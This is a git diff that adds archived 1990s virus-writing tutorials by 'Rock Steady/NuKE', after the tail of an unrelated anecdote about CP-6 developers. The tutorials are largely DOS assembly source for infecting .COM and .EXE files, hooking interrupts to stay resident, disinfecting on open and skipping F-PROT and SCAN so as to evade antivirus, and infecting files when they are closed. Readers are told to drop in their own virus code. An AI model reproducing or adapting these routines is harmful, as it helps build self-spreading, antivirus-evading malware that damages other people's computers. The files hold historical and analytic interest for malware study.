+mainframe business.  Both of them made serious and substantial
+contributions to the Honeywell CP-6 operating system development effort.
+Robin Hood (Dan Holle) did much of the development of the PL-6
+system-programming language compiler; Friar Tuck (John Gabler) was one
+of the chief communications-software gurus for several years.  They're
+both alive and well, and living in LA (Dan) and Orange County (John).
+Both are among the more brilliant people I've had the pleasure of
+working with.
+
+Disclaimers: it has been quite a while since I heard the details of how
+this all went down, so some of the details above are almost certainly
+wrong.  I shared an apartment with John Gabler for several years, and he
+was my Best Man when I married back in '86... so I'm somewhat
+predisposed to believe his version of the events that occurred.
+
+- --
+Dave Platt
+  Coherent Thought Inc.  3350 West Bayshore #205  Palo Alto CA 94303
+
+
+
\ No newline at end of file
diff --git a/textfiles.com/virus/rstut001.txt b/textfiles.com/virus/rstut001.txt
new file mode 100644
index 00000000..2d2761ab
--- /dev/null
+++ b/textfiles.com/virus/rstut001.txt
@@ -0,0 +1,176 @@
+                    *************************************                     
+                    **  Disinfecting an Infected File  **                     
+                    **                                 **                     
+                    **       By Rock Steady/NuKE       **                     
+                    *************************************                     
+                                                                              
+The BEST advantage a virus can have is `Disinfecting of Fly' as we must       
+try to basically hide the virus as well as possible! And nowadays Anti-       
+Virus programs are going crazy. As I remember at the time Npox 2.0 was        
+developed it would Disinfect every file opened by F-prot and Scan and         
+when the Scanner found nothing and closed the file to go on to the next       
+Npox would re-infect them. Truly can cause havoc, As a matter of fact         
+Frisk didn't like this as I had some `Anti Fuck-Prot' routines and he         
+added his own routine to open files by Int21h/6C00h, as Npox only             
+disinfected on Int21h/3Dh, however to make the virus disinfect on             
+Int21h/6C00h, doesn't require much work, simply to take the ASCIIZ            
+string at DS:SI and put SI into DX so we have DS:DX pointing to it,           
+then run this routine.                                                        
+                                                                              
+The Basic idea on disinfection is this...                
+  -For .COM files                                        
+     Restore the first 3 bytes original Bytes of the program, these           
+     3 bytes are usually somewhere inside the virus, and then simply          
+     remove the virus from the end of the .COM file!                          
+     We do this by jumping to the end of the COM file and subtracting         
+     the Virus size from the File size and that new value is the              
+     original file size!                                                      
+     NOTE: if you write a virus that its length changes (Polymorphic)         
+     its wise to save the original Filesize to be infected before             
+     hand.                                                                    
+                                                                              
+  -For .EXE files & Overlays                                                  
+     This procedure is not different, just that if you changed CS:IP &        
+     SP:SS in the EXE header, simply restore the original values, or to       
+     save time, simple save the Original EXE header (first 1b bytes) in       
+     the virus and right that to the beginning as I did for Npox 2.0          
+     Then Subtract yourself from the original size and cut it off!            
+                                                                              
+I will now follow thru the Npox 2.0 virus routine Closely so you can under    
+stand this process.                                                           
+                                                         
+Okay first thing you would want to do is CHECK if this is
+If the virus infects COMs & EXEs, do not waste your time looking thru         
+other extensions, or for tight code you can waste your time and "HOPE"        
+the `infection' marker will fail! Meaning if the virus uses the seconds       
+field set to 60 (as Npox) then naturally only INFECTED files will have        
+a time stamp of 60! And this routine is not needed...                         
+                                                                              
+opening_file:   call    check_extension         ;Check for .COM extension     
+                jnc     open_fuck2              ;YES; Jmp & Disinfect         
+                call    check_exten_exe         ;Check for .EXE extension     
+                jnc     open_fuck2              ;YES; Jmp & disinfect         
+                jmp     dword ptr cs:[int21]    ;Other wise goto DOS          
+                                                                              
+; At this point the file has an .COM or .EXE extension, so we continue        
+                                                                              
+open_fuck2:     push    ax                      ;Save AX                      
+                mov     ax,3d02h                ;Ready to open                
+                call    calldos21               ;Do it!                       
+;NOTE: its important you called Int21h YOURSELF! you CAN NOT do a "Int 21h"   
+;command, as the virus will intercept it, and will come to this routine       
+;and it will continue over and over again, Never ending l
+;stack gets too big, overwrite the code and the system ja
+;in about 2 seconds...                                                        
+                jnc     open_fuck1              ;No Error Continue            
+                pop     ax                      ;restore                      
+                iret                            ;Exit                         
+                                                                              
+open_fuck1:     push    bx                                                    
+                push    cx                                                    
+                push    dx                                                    
+                push    ds                                                    
+                mov     bx,ax                   ;BX=File handler              
+                mov     ax,5700h                ;Get file TimeStamp           
+                call    calldos21                                             
+                                                                              
+                mov     al,cl                   ;move seconds into al         
+                or      cl,1fh                  ;Left just seconds            
+                dec     cx                      ;60 Seconds                   
+                xor     al,cl                   ;cmp                          
+                jnz     opening_exit3           ;NOT 60 seconds exit!         
+                                                                              
+                dec     cx                                                    
+                mov     word ptr cs:[old_time],cx  ;Save 
+                mov     word ptr cs:[old_date],dx  ;Save Date Stamp           
+                                                                              
+                mov     ax,4202h                ;Goto the End of File         
+                xor     cx,cx                                                 
+                xor     dx,dx                                                 
+                call    calldos21                                             
+                                                                              
+                mov     cx,dx                   ;Save the filesize            
+                mov     dx,ax                   ;we will need it later        
+                                                ;to subtract the virus        
+                push    cx                      ;size fromit...               
+                push    dx                      ;Save it...                   
+                                                                              
+Here now we get the first 3 bytes (for com) or first 1B bytes (EXE header)    
+in the Nuke Pox virus I save the ORIGINAL first 3 bytes of the .com at        
+the VERY END! Since the buffer I made was 1B hex bytes, it is able to         
+hold the EXE header or 3 .com bytes, anyhow the beginning of these            
+bytes are the last 1B bytes, since its at the end... figure it out where      
+you saved your 3 bytes or exe header for your virus, or use the Npox          
+routine...                                               
+                                                         
+                sub     dx,1Bh                  ;Subtract 1B bytes from       
+                sbb     cx,0                    ;the filesize!                
+                mov     ax,4200h                ;Now our pointer will         
+                call    calldos21               ;point to the 1B bytes        
+                                                ;Where the COM & EXE          
+                                                ;original bytes are           
+                push    cs                                                    
+                pop     ds                      ;CS=DS (for exes)             
+                                                                              
+                mov     ah,3fh                  ;Read them into Buffer        
+                mov     cx,1Bh                  ;1B bytes                     
+                mov     dx,offset buffer        ;to our buffer                
+                call    calldos21                                             
+                                                                              
+humm, now we got the original bytes, all we gotta do is write them            
+back to the file's beginning...                                               
+                                                                              
+                xor     cx,cx                   ;Goto Beginning of File       
+                xor     dx,dx                   ;                             
+                mov     ax,4200h                         
+                call    calldos21                        
+                                                                              
+                mov     ah,40h                  ;Write first three bytes      
+                mov     dx,offset buffer        ;our buffer                   
+                mov     cx,1Bh                  ;1B bytes for EXEs            
+                cmp     word ptr cs:[buffer],5A4Dh                            
+                je      open_exe_jmp            ;if EXE file jump             
+                mov     cx,3h                   ;if COM write only 3 bytes    
+open_exe_jmp:   call    calldos21                                             
+                                                                              
+We wrote the original file's data back to place, now we need to cut the       
+virus off from the file, the virus is written at the end of the file,         
+so all we do is set our file-pointer to EOF - Virus_Size, which gives         
+us the original file length!                                                  
+                                                                              
+                pop     dx                      ;EOF - Virus_Size             
+                pop     cx                      ;to get ORIGINAL File size    
+                sub     dx,virus_size           ;subtract virus size          
+                sbb     cx,0                                                  
+                mov     ax,4200h                                              
+                call    calldos21                        
+                                                         
+Now this is perhaps the "TRICKIEST" part, in order to "CROP" the file, at     
+our new ptr location, what we do it use does to crop it, by writing 0         
+bytes to the new location, DOS will make that new location the NEW            
+EoF and in result cutting off the virus and deleting its sector in the        
+fat.                                                                          
+                                                                              
+                mov     ah,40h                  ;Write new EOF                
+                xor     cx,cx                   ;Zero Bytes                   
+                call    calldos21               ;doit                         
+                                                                              
+                mov     cx,word ptr cs:[old_time]     ;Restore file time      
+                mov     dx,word ptr cs:[old_date]     ;Restore file date      
+                mov     ax,5701h                                              
+                int     21h                                                   
+                                                                              
+                mov     ah,3eh                  ;Close File                   
+                call    calldos21                                             
+                                                                              
+opening_exit3:  pop     ds                                                    
+                pop     dx                               
+                pop     cx                               
+                pop     bx                                                    
+                pop     ax                                                    
+                jmp     dword ptr cs:[int21]     ;Return to DOS...            
+                                                                              
+ahh, the file is now Disinfected, now we safely return it to DOS and DOS      
+may now open the file for inspection...                                       
+                                                                              
+                                Rock Steady/NuKE                              
diff --git a/textfiles.com/virus/rstut002.txt b/textfiles.com/virus/rstut002.txt
new file mode 100644
index 00000000..e4ef7839
--- /dev/null
+++ b/textfiles.com/virus/rstut002.txt
@@ -0,0 +1,175 @@
+                        ***********************************
+                        **       TSR COM infections      **
+                        **                               **
+                        **      By Rock Steady/NuKE      **
+                        ***********************************
+
+     There are several ways to constructed your viruses. Mainly you have those
+ which are RAM-Resident or better known as a TSR program. And with great
+ thought we have those which are not RAM-Resident.
+
+     A TSR virus will load into memory and can infect all programs that are
+ executed by the computer. Such like my AmiLiA virus which will infect all
+ EXE and COM files that are ran. Anyhow a TSR virus can certainly spread a lot
+ faster compared to a Non-Resident Virus. Because a NON-Resident Virus will
+ only infect file each time it is ran. Though the NON-Resident will start
+ off very slowly infecting the system files but after the virus is in the
+ system after a number of weeks, it will certainly infect ALL files that are
+ in the system. Where a TSR virus will USUALLY infect files that are executed.
+ So that only files that are often executed will be infected. But The TSR
+ virus can certainly infect A LOT more files than a Non-Resident JUST on the
+ first Hour! It is out numbered 10 to 1. This is the advantage that all
+ programmers enjoy and program TSR viruses. I will explain a SIMPLE method of
+ making your program a TSR one. And it will be as flexible as you want so
+ that NO ONE can stay you `Stole' this information off Rock Steady.
+
+     Anyhow I will explain the simple Process of Intercepting ROM-Bios
+ Interrupts and hooking your virus/Program to any Interrupt of your choice.
+ This method that is being explained is also used ALL the Jerusalem Strains.
+ And several of the Vacsina Strains. They total up to close to 100+ Viruses
+ that use this simple way with the TSR Interrupt 27h. Anyhow just because I'm
+ explaining this method your virus CANNOT be detected because of this TSR
+ routines because there are routines I DEVELOPED ALONE and will soon to be
+ release in one of my future virii. Anyhow there are an UNLIMITED amount of
+ ways to make TSRs so that along as you Develop YOUR OWN routine it will NEVER
+ get detected as a virus for all you Beginners. And how this routine can be
+ used in several OTHER utilities not just viruses.
+
+                             Beginning...
+                             ~~~~~~~~~~~
+     First we must Intercept an Interrupt, Lets say we want our virus to
+ activate Every TIME the disk I/O is being used we would use INT 13h or
+ INT 21h. The INT 13h will activate everytime ANY file is opened or Closed
+ And the INT 21h will activity anytime any file is executed or any INT 21h
+ functions Like a "DIR" in DOS. If you want you can even hooked your virus
+ to INT 10h and it may activate when Graphics are displayed, or you can hook
+ it to the interrupt involved with Printer Functions. Whatever seems to
+ `EnLighten' you, since we live in a Distressed world, I won't even bother
+ why we shouldn't hooked them up to just ANY interrupt.
+
+     Anyhow, interrupts use a vector table at the bottom of memory (ROM) to
+ find out what routine in the ROM Bios to call. So the address for Interrupt
+ 21h would be located at 0000:0084 and for Interrupt 13h it would be found at
+ 0000:004Ch. So we can change theses addresses in the vector table. What we
+ do is we change the vector address to POINT to our virus. So everytime the
+ Interrupt is called it goes to the vector table and the table tells it to
+ call our Virus, rather than calling the ROM Bios. But what MUST do
+ FIRST is save the ORIGINAL Interrupt routine and place that somewhere in
+ memory. So that our virus will call the Original ROM Bios routine after
+ executing itself.
+
+     Lets say we hooked our Virus to the INT 13h, which controls all Disk
+ Activities. So if our Computer users tries to read something from the disk
+ the Computer will call the INT 13h bios Routines on How To do it. But
+ instead of finding the INT 13h routines it calls our virus, and the Virus
+ gets ran, which then our virus does what it has to do, and then runs the
+ Original INT 13h Routine where-ever it was stored. So it simulates an INT
+ call to the ROM bios routines.
+
+ ;----------------------------------------------------------------
+ ; Sample Program on how to Hook your virus to an Interrupt call.
+ ;----------------------------------------------------------------
+ Code        Segment
+         Assume  cs:code,ss:code,ds:code,es:code
+         Org     100h       ; Guess this will be a COM file? Huh?
+
+
+ Begin:  JMP     Bios_Routine
+
+         NOP                  ; This is just a cheap .COM file that the
+         NOP                  ; virus is attached to. Remember you should
+         NOP                  ; have the first 3 bytes written in your
+         INT     20h          ; virus.
+
+ OLD_ROM_INT     DD      ?    ;Our Stack to save the OLD Int Address
+
+ ;----------------------------------------------------------------
+ ; This Calls the VIRUS and then the simulates the OLD Rom Routine
+ ;----------------------------------------------------------------
+ Virus_Codes    PROC     FAR
+        Assume  cs:code, ds:nothing
+
+        pushf               ; Everytime the ROM-Routine is call this
+        push    ax          ; is what happens... Saves the Regesters
+        push    di          ; And runs Our Virus... Then it restores
+        push    si          ; the regesters and Runs the OLD_ROM Bios
+        push    es          ; Routine that was supposed to be ran in
+        push    ds          ; the first place...
+        call    The_Virus
+        pop     ds          ;NoTe: It's better to SAVE all Regesters and
+        pop     es          ; Flags because our Virus WILL ALTER a few
+        pop     si          ; And when the Virus leaves control back to the
+        pop     di          ; Computer it is EXPECTED to continue where it
+        pop     ax          ; It left off...
+        popf
+
+        pushf            ; This `pushf' is NEEDED to act like a simulated
+        call    OLD_ROM_INT       ; ROM Bios Interrupt call...
+
+        ret
+ Virus_Codes   ENDP
+
+ ;----------------------------------------------------------------
+ ; Put the REAL Virus Codes here...
+ ;----------------------------------------------------------------
+ The_Virus        PROC    NEAR
+        ...            ; Put your OWN Virus codes here...
+        ...            ; Just make it compatible with our
+        ...            ; Codes... Try to make it small and
+        ...            ; it will take up less space in the
+        ...            ; users' memory.
+        ...
+        ...            ;NoTe: Try to infect files that are ONLY
+        ...            ; Executed! Rather than each time the INT
+        ...            ; is used... Get it?
+        RET
+ The_Virus      ENDP
+
+ ;---------------------------------------------------------------
+ ; This is the Procedure that SAVE the OLD_ROM Bios in our Virus
+ ; And places a Call to point to our Virus. Which then Calls the
+ ; OLD_ROM Bios Routine. So Remember to SAVE it first.
+ ;---------------------------------------------------------------
+ Bios_Routine   PROC    NEAR
+        Assume  cs:code,ds:code
+
+        mov     ah,35h      ; This Asks for the interrupt vector!
+        mov     al,13h      ; whatever is in AL is what int vector
+        int     21h         ; address you get and is stored in ES:BX
+
+        mov     word ptr OLD_ROM_INT,bx   ;Save the BX register in our Stack
+        mov     word ptr OLD_ROM_INT[2],es ;And same to the ES Register
+
+ ; Here you SHOULD put a small routine to check if the Interrupt vector has
+ ; already been changed! For INT 13h this should contain 0000:004Ch the
+ ; formula for this is (Interrupt # times 4) For INT 21h it is (21hx4)=84h
+ ; and so on. So if its been changed it means the virus has already changed
+ ; it! And it `Should' be resident. How ever this is a simple way of doing
+ ; it. but not always the BEST way... Because any program the hooks to the
+ ; virus interrupt will fool the virus to think it is already resident.
+ ; Though this source is NOT for the Professional Virus Programmer like myself
+ ; because WE KNOW! But for those that are half way there...
+
+        mov     ah,25h    ; This asks to set a Interrupt vector address!
+        mov     al,13h    ; Interrupt # to be set goes in AL
+        mov     dx,offset Virus_Codes ; Sets INT 13h to point to `Virus Code'
+        int     21h
+
+        mov     dx,offset Bios_Routine
+        int     27h
+ Bios_Routine     ENDP
+
+ ;  Anything after this point will not be memory resident. because the end
+ ;  of the resident portion ends at `Bios_Routine' procedure.
+
+ Code        ENDS
+      END    Begin
+ ;----------------------------- EnD ----------------------------------
+
+ Simple isn't it? Anyhow I tried to make this as simple as possible. I
+ hope I didn't lose you. Anyhow this is a simple routine that several
+ TSR virii use. Anyhow, see what that gives you....
+
+                           Rock Steady
+               NukE / Viral Development Researcher
+                             -PeAcE-                    
diff --git a/textfiles.com/virus/rstut003.txt b/textfiles.com/virus/rstut003.txt
new file mode 100644
index 00000000..1a309a47
--- /dev/null
+++ b/textfiles.com/virus/rstut003.txt
@@ -0,0 +1,191 @@
+                   ******************************************
+                   **  Constructing Kit on infecting .COM  **
+                   **                                      **
+                   **          By Rock Steady/NuKE         **
+                   ******************************************
+
+
+     Well I must state my opinion that there are certainly WAY too many
+ Overwriting Viruses out here. To help put a Stop to this I will try
+ to explain to you a SIMPLE way to infect COM files at the END of the
+ Program. This routine WORKS if you follow my steps correctly, and
+ I've already used this in my `ParaSite ][' Virus.
+
+ Anyhow this is a brief description what the ASM Source will do.
+             1. Find a .COM file in the current Directory
+             2. Save the Date and File's Attribute.
+             3. Save the First 3 Bytes in a Stack
+             4. Infect the File & restore new 3 bytes..
+             5. Put the OLD date and File Attributes back on
+
+                          Beginning...
+                         ~~~~~~~~~~~~
+ ;----------------------------------------------------------------------
+ ; The Simple routine to Search for a .COM File...
+ ;----------------------------------------------------------------------
+ com_files       db      "*.com",0
+
+         mov     ah,4eh          ;point to a *.COM file...
+         mov     dx,com_files
+         mov     cx,3            ;Attributes with ReadOnly or Hidden
+         int     21h             ;is A okay...
+
+         cmp     ax,12h          ;Any files found?
+         je      exit            ;If no Files found Exit...
+         jmp     found_file
+ ; Instead of Exiting here you can make the Virus go and change dir and
+ ; look for several other .com files else where... with the help of the
+ ; path or simply searching for more <dir>...
+
+ found_file:
+         mov     di,[si+file] ;di points to the filename
+         push    si
+         add     si,file          ;si points to filename...
+
+         mov     ax,offset 4300h  ;get file Attributes...
+         mov     dx,si            ;filename in dx..
+         int     21h
+
+         mov     file_attrib,cx   ;Save file Attributes.
+
+ file    dw      0
+ ; Here we'll set the file attributes to nothing
+
+         mov     ax,offset 4301h    ;To set file Attributes...
+         mov     cx,offset 0fffeh   ;Set them to a Normal File
+         mov     dx,si              ;filename...
+         int     21h
+
+         mov     ax,offset 3d02h    ;Open File to Read/Write.
+         mov     dx,si              ;ASCIIZ filename
+         int     21h
+
+         jnb     ok                 ;If file was open continue
+         jmp     put_old_attrib     ; error happened restore old attribs
+                                    ; and quit.
+ ok:
+         mov     bx,ax
+         mov     ax,offset 5700h    ;Get File Date & Time...
+         int     21h
+
+         mov     old_time,cx        ;Save old File Time...
+         mov     old_date,dx        ;Save old File Date
+
+ old_time        db      0
+ old_date        db      0
+
+ ; here we infect the file... but first we SAVE the first 3 bytes
+ ; somewhere in our virus
+
+         mov     ah,3fh          ;Read file...
+         mov     cx,3            ;Number of bytes to read
+         mov     dx,first_3      ;Save bytes in the buffer
+         add     dx,si           ;Filename...
+         int     21h
+
+         cmp     ax,3            ;Where 3 bytes read?
+         jnz     fix_file        ;If not fix file like before and quit
+
+ first_3     equ     $    ; The First three bytes of the Original File!
+             int     20h  ; the virus is infected to.
+             nop
+
+ ; This moves the File pointer to the END of the file
+
+         mov     ax,offset 4202h
+         mov     cx,0
+         mov     dx,0
+         int     21h
+         mov     cx,ax          ;DX:AX is the FILESIZE!
+         sub     ax,3           ;subtract three because of file pointer
+
+         add     cx,offset c_len_y
+         mov     di,si
+         sub     di,offset c_len_x
+         mov     [di],cx        ;Modifies the 2nd & 3rd bytes of program
+
+ ; The writes our virus to the file
+
+         mov     ah,40h
+         mov     cx,virlength      ;Virus Length
+         mov     dx,si             ;File...
+         sub     dx,offset codelength  ;Length of virus codes.
+         int     21h
+
+         cmp     ax,offset virlength   ;all bytes written?
+         jnz     fix_file              ;If no fix file and quit
+
+ ;Moves the file pointer to the beginning of file and write the
+ ;3 bytes JMP at the beginning of the file
+
+         mov     ax,offset 4200h
+         mov     cx,0
+         mov     dx,0
+         int     21h
+                                                          
+         mov     ah,40h       ;Write to file...
+         mov     cx,3         ;# of bytes to write...
+         mov     dx,si        ;File name...
+         add     dx,jump      ;Point to the new JMP statement
+         int     21h
+
+ jump    db      0e9h    ;This is the JMP that will be put in the
+                         ;Begining of the file!
+
+ ;Restore Old File Time & Date
+
+ fix_file:
+         mov     dx,old_date     ;Old File Date
+         mov     cx,old_time     ;Old file Time...
+         and     cx,offset 0ffe0h ;Flat Attribs.
+         mov     ax,offset 5701h
+         int     21h
+
+         mov     ah,3eh
+         int     21h             ;Close file...
+
+
+ ; Here we'll restore the old file attributes...
+
+ put_old_attrib:
+         mov     ax,offset 4301h
+         mov     cx,old_att      ;old File Attributes.
+         mov     dx,si           ;Filename...
+         int     21h
+
+ ;----------------------------- EnD -------------------------------------
+
+ Anyhow that's it... Simple no? This source was also used in my ParaSite ][
+ Virus that is STILL undetectable to date with Scanv85. Anyhow I even made
+ it MORE simpler than my real sources that have to play with the file paths.
+
+ Anyhow theres still work to be done, like you must restore the old data file
+ so it will jump to 100h and run the old file the virus was infected too!
+ Remember to store them in the beginning and then restore them! Anyhow there's
+ a few Variables to be put in like `VirLength' which you should know how to
+ do that also the `CodeLength' that is the VIRUS codes ONLY not counting the
+ Stacks.
+
+ Anyhow This works FINE with a Non-Resident Virus. Because a few statements
+ would have to be edited for TSRs. Anyhow try to use this, it's small neat
+ and fast.
+
+ Anyhow Perhaps next issue I will develop a SIMPLE Ram-Resident virus that
+ infects COMs and EXEs to be released into the next issue! Though I just
+ release this sources for you to LEARN! Rather than putting you name on my
+ virus and releasing another strain on work I worked Hard upon! Anyhow I
+ should release a SIMPLE new Virus source for all you programmers out there!
+ And I will even explain a few Stealth Technics like how to hide your program
+ in memory right under the TOM.
+
+ If there's Any Questions you want to know, please ask them I will answer
+ them in the next [NukE] Releases... I may even release source codes on how
+ to make an Algorithm Encryption method! I've developed one on my own,
+ without the V2PX viruses sources... Anyhow it does the job and the formula
+ I developed has an UNLIMITED amount of encryption methods! But since the
+ virus codes have to be SMALL Like close to 2,000 bytes I will limit the
+ formula to about 1,000 different combinations!
+
+                            Rock Steady
+                 NukE / Viral Development Reaseacher
+                              -PeAcE-                     
diff --git a/textfiles.com/virus/rstut004.txt b/textfiles.com/virus/rstut004.txt
new file mode 100644
index 00000000..ed71f5aa
--- /dev/null
+++ b/textfiles.com/virus/rstut004.txt
@@ -0,0 +1,255 @@
+                        ****************************                          
+                        **  Infection on Closing  **                          
+                        **                        **                          
+                        **  By Rock Steady/NuKE   **                          
+                        ****************************                          
+
+This routine goes out for a few people that had trouble hacking this          
+routine themselves... I kinda like it, its my very OWN, no Dark Avenger       
+hack, it is VERY straight forward, and kinda simple...I was not going         
+to put this here, but since I `Promised' people and left them hanging         
+with `Wait for IJ#5, I guess I owed you it... huh?'                           
+                                                                              
+Again this code comes right out of Npox 2.0, its need, simple fast,           
+cool, and it works, Npox is your example, I heard MANY MANY complaints        
+with other `Virus writing guides' Meaning they explained the code but         
+sometimes the arthur himself never check if the code was good, as he          
+may have modified it, and not test it... or whatever reason... Anyhow         
+                                                                              
+------------------                                                            
+Okay once you intercepted the Int21h/ah=3Dh function you make it jump         
+here...                                               
+                                                                              
+closing_file:   cmp     bx,0h                   ;Handle=0?                    
+                je      closing_bye             ;if equal leave               
+                cmp     bx,4h                   ;Handle > 4                   
+                ja      close_cont              ;if YES ,then JUMP!           
+closing_bye:    jmp     dword ptr cs:[int21]    ;Leave, no interest to us     
+                                                                              
+The whole point of the above code is that DOS contains 5 predefined           
+Handlers, 0 -> 4, Basically, those handles are the NULL, CON, AUX             
+COMx, LPTx handles... So we surely do not need to continue once we            
+encounter that...                                                             
+                                                                              
+close_cont:     push    ax                                                    
+                push    bx                                                    
+                push    cx                                                    
+                push    dx                                                    
+                push    di                                                    
+                push    ds                                                    
+                push    es                                                    
+                push    bp                                                    
+                                                                              
+Our biggest problem is how do we know if this file is a .COM or .EXE or       
+simply just another dumb data file? We need this info before we can           
+try to infect it... We do this by getting DOS's "Lists of List" this          
+will give us all INFO need on the File Handle Number we have in BX!           
+and we do that like so...                                                     
+                                                                              
+                push    bx                      ;Save File Handle             
+                mov     ax,1220h                ;Get the Job File Table       
+                int     2fh                     ;(JFT)                        
+                                                                              
+This will give us the JFT for the CURRENT File handle in BX, which            
+is given thru ES:DI Then we use this information to get the Address of        
+the System File Table!                                                        
+                                                                              
+                mov     ax,1216h        ;Get System File Table (List)         
+                mov     bl,es:[di]      ;system file table entry number       
+                int     2fh                                                   
+                pop     bx              ;restore the Handle                   
+                                                                              
+                add     di,0011h                                              
+                mov     byte ptr es:[di-0fh],02h                              
+                                                                              
+                add     di,0017h                ;Jump to the ASCIIZ string    
+                cmp     word ptr es:[di],'OC'   ;Is it a .COM file?           
+                jne     closing_next_try        ;Next cmp...                  
+                cmp     byte ptr es:[di+2h],'M'                               
+                jne     pre_exit                ;Nope exit                    
+                jmp     closing_cunt3           ;.COM file continue           
+                                                                              
+closing_next_try:                                                             
+                cmp     word ptr es:[di],'XE'   ;Is it a .EXE file?           
+                jne     pre_exit                ;No, exit                     
+                cmp     byte ptr es:[di+2h],'E'                               
+                jne     pre_exit                ;No, exit                     
+                                                                              
+If it is an .EXE file, check if it is F-PROT or SCAN, see F-PROT when         
+started up, Opens itself, closes itself, etc... So that a dumb                
+virus will infect it, and then the CRC value changes and F-PROT               
+screams... haha... Fuck-Prot! is the name...                                  
+                                                                              
+closing_cunt:   cmp     word ptr es:[di-8],'CS'                               
+                jnz     closing_cunt1              ;SCAN                      
+                cmp     word ptr es:[di-6],'NA'                               
+                jz      pre_exit                                              
+                                                                              
+closing_cunt1:  cmp     word ptr es:[di-8],'-F'                               
+                jnz     closing_cunt2              ;F-PROT                    
+                cmp     word ptr es:[di-6],'RP'                               
+                jz      pre_exit                                              
+                                                                              
+closing_cunt2:  cmp     word ptr es:[di-8],'LC'                               
+                jnz     closing_cunt3                                         
+                cmp     word ptr es:[di-6],'AE'    ;CLEAN                     
+                jnz     closing_cunt3                                         
+                                                                              
+pre_exit:       jmp     closing_nogood                                        
+                                                                              
+The REST is pretty much the EXACT same on `how' you'd infect a normal         
+file, I'll leave it for you to go thru it... The hardest part is              
+OVER! Only trick part is, the ending... Remember to Close the file            
+and then do an IRET, you don't leave control to dos, as you only needed       
+to close it, so do it... OR DON'T close it and return to DOS, as dos          
+will close it, just DON'T CLOSE IT TWICE!!!!                                  
+                                                                              
+closing_cunt3:  mov     ax,5700h                        ;Get file Time        
+                call    calldos21                                             
+                mov     al,cl                                                 
+                or      cl,1fh                                                
+                dec     cx                              ;60 Seconds           
+                xor     al,cl                                                 
+                jz      closing_nogood                  ;Already infected     
+                                                                              
+                push    cs                                                    
+                pop     ds                                                    
+                mov     word ptr ds:[old_time],cx       ;Save time            
+                mov     word ptr ds:[old_date],dx                             
+                                                                              
+                mov     ax,4200h                        ;jmp beginning of     
+                xor     cx,cx                           ;file...              
+                xor     dx,dx                                                 
+                call    calldos21                                             
+                                                                              
+                mov     ah,3fh                          ;Get first 1b byte    
+                mov     cx,1Bh                                                
+                mov     dx,offset buffer                                      
+                call    calldos21                                             
+                                                                              
+                jc      closing_no_good                 ;error?               
+                mov     ax,4202h                        ;Jmp to the EOF       
+                xor     cx,cx                                                 
+                xor     dx,dx                                                 
+                call    calldos21                                             
+                                                                              
+                jc      closing_no_good                                       
+                cmp     word ptr ds:[buffer],5A4Dh      ;.EXE file?           
+                je      closing_exe                     ;Yupe then jmp        
+                mov     cx,ax                                                 
+                sub     cx,3h                                                 
+                mov     word ptr ds:[jump_address+1],cx  ;Figure out the      
+                call    infect_me                        ;jmp for .com        
+                                                                              
+                jc      closing_no_good                                       
+                mov     ah,40h                          ;Write it to file     
+                mov     dx,offset jump_address                                
+                mov     cx,3h                                                 
+                call    calldos21                                             
+closing_no_good:                                                              
+                mov     cx,word ptr ds:[old_time]       ;Save file time       
+                mov     dx,word ptr ds:[old_date]       ;& date               
+                mov     ax,5701h                                              
+                call    calldos21                                             
+                                                                              
+closing_nogood: pop     bp                                                    
+                pop     es                                                    
+                pop     ds                                                    
+                pop     di                                                    
+                pop     dx                                                    
+                pop     cx                                                    
+                pop     bx                                                    
+                pop     ax                                                    
+                jmp     dword ptr cs:[int21]                                  
+                                                                              
+AS you see the above, we DIDN'T close the file, so we leave dos to do it.     
+The bottom is for infecting .exes...                                          
+                                                                              
+closing_exe:    mov     cx,word ptr cs:[buffer+20]      ;Save the original    
+                mov     word ptr cs:[exe_ip],cx         ;CS:IP & SS:SP        
+                mov     cx,word ptr cs:[buffer+22]                            
+                mov     word ptr cs:[exe_cs],cx                               
+                mov     cx,word ptr cs:[buffer+16]                            
+                mov     word ptr cs:[exe_sp],cx                               
+                mov     cx,word ptr cs:[buffer+14]                            
+                mov     word ptr cs:[exe_ss],cx                               
+                                                                              
+                push    ax                                                    
+                push    dx                                                    
+                call    multiply                                              
+                sub     dx,word ptr cs:[buffer+8]                             
+                mov     word ptr cs:[vir_cs],dx                               
+                push    ax                                                    
+                push    dx                                                    
+                call    infect_me                                             
+                pop     dx                                                    
+                pop     ax                                                    
+                mov     word ptr cs:[buffer+22],dx                            
+                mov     word ptr cs:[buffer+20],ax                            
+                pop     dx                                                    
+                pop     ax                                                    
+                jc      closing_no_good                                       
+                                                                              
+                add     ax,virus_size                                         
+                adc     dx,0                                                  
+                                                                              
+                push    ax                                                    
+                push    dx                                                    
+                call    multiply                                              
+                sub     dx,word ptr cs:[buffer+8]                             
+                add     ax,40h                                                
+                mov     word ptr cs:[buffer+14],dx                            
+                mov     word ptr cs:[buffer+16],ax                            
+                pop     dx                                                    
+                pop     ax                                                    
+                                                                              
+                push    bx                                                    
+                push    cx                                                    
+                mov     cl,7                                                  
+                shl     dx,cl                                                 
+                                                                              
+                mov     bx,ax                                                 
+                mov     cl,9                                                  
+                shr     bx,cl                                                 
+                                                                              
+                add     dx,bx                                                 
+                and     ax,1FFh                                               
+                jz      close_split                                           
+                inc     dx                                                    
+close_split:    pop     cx                                                    
+                pop     bx                                                    
+                                                                              
+                mov     word ptr cs:[buffer+2],ax                             
+                mov     word ptr cs:[buffer+4],dx                             
+                                                                              
+                mov     ah,40h                                                
+                mov     dx,offset ds:[buffer]                                 
+                mov     cx,20h                                                
+                call    calldos21                                             
+                                                                              
+closing_over:   jmp     closing_no_good                                       
+                                                                              
+;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-    
+;                   Infection Routine...                                      
+;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-    
+infect_me       proc                                                          
+                mov     ah,40h                                                
+                mov     dx,offset init_virus                                  
+                mov     cx,virus_size                                         
+                call    calldos21                                             
+                                                                              
+                jc      exit_error                      ;Error Split          
+                mov     ax,4200h                                              
+                xor     cx,cx                           ;Pointer back to      
+                xor     dx,dx                           ;Top of file!         
+                call    calldos21                                             
+                                                                              
+                jc      exit_error                      ;Split Dude...        
+                clc                                     ;Clear carry flag     
+                ret                                                           
+exit_error:                                                                   
+                stc                                     ;Set carry flag       
+                ret                                                           
+infect_me       endp                                                          
+
+
diff --git a/textfiles.com/virus/rstut005.txt b/textfiles.com/virus/rstut005.txt
new file mode 100644
